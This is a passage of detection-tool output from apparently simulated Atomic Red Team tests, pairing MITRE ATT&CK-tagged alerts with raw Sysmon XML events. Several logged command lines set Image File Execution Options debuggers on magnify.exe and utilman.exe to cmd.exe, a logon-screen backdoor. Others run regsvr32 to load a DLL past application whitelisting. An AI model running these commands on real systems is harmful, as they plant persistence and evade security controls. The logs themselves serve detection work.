<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:13.173</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A5-5D31-0000-0010C0A03200</Data>
<Data Name=""ProcessId"">6116</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547813.127595,2019-07-19T18:50:13.127595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:13.109148Z"">
</TimeCreated>
<EventRecordID>3741</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:13.096</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A5-5D31-0000-0010729B3200</Data>
<Data Name=""ProcessId"">4212</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547813.109148,2019-07-19T18:50:13.109148+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:10.324832Z"">
</TimeCreated>
<EventRecordID>3740</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:10.306</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A2-5D31-0000-0010D8943200</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547810.282757,2019-07-19T18:50:10.282757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:10.266630Z"">
</TimeCreated>
<EventRecordID>3737</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:10.253</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A2-5D31-0000-00108A8F3200</Data>
<Data Name=""ProcessId"">6156</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547810.26663,2019-07-19T18:50:10.266630+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:07.357083Z"">
</TimeCreated>
<EventRecordID>3736</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:07.335</Data>
<Data Name=""ProcessGuid"">747F3D96-D89F-5D31-0000-0010BC823200</Data>
<Data Name=""ProcessId"">2404</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-20T11:51:09.842559Z"">
</TimeCreated>
<EventRecordID>1103</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""7212"" ThreadID=""5064"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DESKTOP-NTSSLJD</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">-</Data>
<Data Name=""UtcTime"">2020-10-20 11:51:09.588</Data>
<Data Name=""ProcessGuid"">23F38D93-CEB4-5F8E-9F08-000000000C00</Data>
<Data Name=""ProcessId"">9392</Data>
<Data Name=""Image"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">10.0.18362.1049 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">SAMLib.DLL</Data>
<Data Name=""Hashes"">SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-20T11:51:09.842559Z"">
</TimeCreated>
<EventRecordID>1103</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""7212"" ThreadID=""5064"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DESKTOP-NTSSLJD</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">-</Data>
<Data Name=""UtcTime"">2020-10-20 11:51:09.588</Data>
<Data Name=""ProcessGuid"">23F38D93-CEB4-5F8E-9F08-000000000C00</Data>
<Data Name=""ProcessId"">9392</Data>
<Data Name=""Image"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">10.0.18362.1049 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">SAMLib.DLL</Data>
<Data Name=""Hashes"">SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548027.083068,2019-07-19T18:53:47.083068+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.975169Z"">
</TimeCreated>
<EventRecordID>4046</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.938</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00102BE33800</Data>
<Data Name=""ProcessId"">4628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( &quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.893188Z"">
</TimeCreated>
<EventRecordID>4045</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.867</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ProcessId"">5828</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( &quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.893188Z"">
</TimeCreated>
<EventRecordID>4045</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.867</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ProcessId"">5828</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( &quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.893188Z"">
</TimeCreated>
<EventRecordID>4045</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.867</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ProcessId"">5828</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( &quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
